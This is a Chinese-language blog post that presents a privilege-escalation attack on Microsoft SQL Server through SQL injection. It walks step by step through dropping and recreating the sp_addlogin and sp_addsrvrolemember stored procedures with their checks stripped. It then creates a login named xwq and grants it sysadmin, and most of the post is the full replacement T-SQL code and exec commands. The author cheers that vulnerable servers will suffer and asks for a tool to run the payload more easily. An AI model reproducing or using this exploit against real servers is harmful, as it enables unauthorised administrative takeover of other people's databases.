[讨论]msSQL注入通杀，只要有注入点就有系统权限 选择自 psyl 的 Blog

不知道大家看过这篇文章没有，可以在db_owner角色下添加SYSADMIN帐号，这招真狠啊，存在MSSQL注射漏洞的服务器又要遭殃了。方法主要是利用db_owner可以修改sp_addlogin和sp_addsrvrolemember这两个存储过程，饶过了验证部分。具体方法如下：先输入drop procedure sp_addlogin,然后在IE里面输入create procedure sp_addlogin @loginame sysname ,@passwd sysname = Null ,@defdb ; ; sysname = ';master'; -- UNDONE: DEFAULT CONFIGURABLE??? ,@deflanguage sysname = Null ,@sid varbinary(16) = Null ,@encryptopt varchar(20) = Null AS -- SETUP RUNTIME OPTIONS / DECLARE VARIABLES -- set nocount on Declare @ret int -- return value of sp call -- DISALLOW USER TRANSACTION -- set implicit_transactions off IF (@@trancount > 0) begin raiserror(15002,-1,-1,';sp_addlogin';) return (1) end -- VALIDATE LOGIN NAME AS: -- (1) Valid SQL Name (SQL LOGIN) -- (2) No backslash (NT users only) -- (3) Not a reserved login name execute @ret = sp_validname @loginame if (@ret <> 0) return (1) if (charindex(';\';, @loginame) > 0) begin raiserror(15006,-1,-1,@loginame) return (1) end --Note: different case sa is allowed. if (@loginame = ';sa'; or lower(@loginame) in (';public';)) begin raiserror(15405, -1 ,-1, @loginame) return (1) end -- LOGIN NAME MUST NOT ALREADY EXIST -- if exists(select * from master.dbo.syslogins where loginname = @loginame) begin raiserror(15025,-1,-1,@loginame) return (1) end -- VALIDATE DEFAULT DATABASE -- IF db_id(@defdb) IS NULL begin raiserror(15010,-1,-1,@defdb) return (1) end -- VALIDATE DEFAULT LANGUAGE -- IF (@deflanguage IS NOT Null) begin Execute @ret = sp_validlang @deflanguage IF (@ret <> 0) return (1) end ELSE begin select @deflanguage = name from master.dbo.syslanguages where langid = @@default_langid --server default language if @deflanguage is null select @deflanguage = N';us_english'; end -- VALIDATE SID IF GIVEN -- if ((@sid IS NOT Null) and (datalength(@sid) <> 16)) begin raiserror(15419,-1,-1) return (1) end else if @sid is null select @sid = newid() if (suser_sname(@sid) IS NOT Null) begin raiserror(15433,-1,-1) return (1) end -- VALIDATE AND USE ENCRYPTION OPTION -- declare @xstatus smallint select @xstatus = 2 -- access if @encryptopt is null select @passwd = pwdencrypt(@passwd) else if @encryptopt = ';skip_encryption_old'; begin select @xstatus = @xstatus | 0x800, -- old-style encryption @passwd = convert(sysname, convert(varbinary (30), convert(varchar(30), @passwd))) end else if @encryptopt <> ';skip_encryption'; begin raiserror(15600,-1,-1,';sp_addlogin';) return 1 end -- ATTEMPT THE INSERT OF THE NEW LOGIN -- INSERT INTO master.dbo.sysxlogins VALUES (NULL, @sid, @xstatus, getdate(), getdate(), @loginame, convert(varbinary(256), @passwd), db_id(@defdb), @deflanguage) if @@error <> 0 -- this indicates we saw duplicate row return (1) -- UPDATE PROTECTION TIMESTAMP FOR MASTER DB, TO INDICATE SYSLOGINS CHANGE -- exec(';use master grant all to null';) -- FINALIZATION: RETURN SUCCESS/FAILURE -- raiserror(15298,-1,-1) return (0) -- sp_addlogin GO OK,我们新建个用户exec master..sp_addlogin xwq 再drop procedure sp_addsrvrolemember,然后在IE里输入 create procedure sp_addsrvrolemember @loginame sysname, -- login name @rolename sysname = NULL -- server role name as -- SETUP RUNTIME OPTIONS / DECLARE VARIABLES -- set nocount on declare @ret int, -- return value of sp call @rolebit smallint, @ismem int -- DISALLOW USER TRANSACTION -- set implicit_transactions off IF (@@trancount > 0) begin raiserror(15002,-1,-1,';sp_addsrvrolemember';) return (1) end -- CANNOT CHANGE SA ROLES -- if @loginame = ';sa'; begin raiserror(15405, -1 ,-1, @loginame) return (1) end -- OBTAIN THE BIT FOR THIS ROLE -- select @rolebit = CASE @rolename WHEN ';sysadmin'; THEN 16 WHEN ';securityadmin'; THEN 32 WHEN ';serveradmin'; THEN 64 WHEN ';setupadmin'; THEN 128 WHEN ';processadmin'; THEN 256 WHEN ';diskadmin'; THEN 512 WHEN ';dbcreator'; THEN 1024 WHEN ';bulkadmin'; THEN 4096 ELSE NULL END -- ADD ROW FOR NT LOGIN IF NEEDED -- if not exists(select * from master.dbo.syslogins where loginname = @loginame) begin execute @ret = sp_MSaddlogin_implicit_ntlogin @loginame if (@ret <> 0) begin raiserror(15007,-1,-1,@loginame) return (1) end end -- UPDATE ROLE MEMBERSHIP -- update master.dbo.sysxlogins set xstatus = xstatus | @rolebit, xdate2 = getdate() where name = @loginame and srvid IS NULL -- UPDATE PROTECTION TIMESTAMP FOR MASTER DB, TO INDICATE SYSLOGINS CHANGE -- exec(';use master grant all to null';) raiserror(15488,-1,-1,@loginame,@rolename) -- FINALIZATION: RETURN SUCCESS/FAILURE return (@@error) -- sp_addsrvrolemember GO 接着再exec master..sp_addsrvrolemember xwq,sysadmin 这样就建立了一个SA用户了，用SQL连接器连接上就OK了。很爽吧。不过在实践过程中发现用NB的SQL命令执行时会提示发送错误，可能是代码太长了的缘故，用IE又不方便，希望哪位能发个执行SQL语句的工具来方便大家。OK，到此结束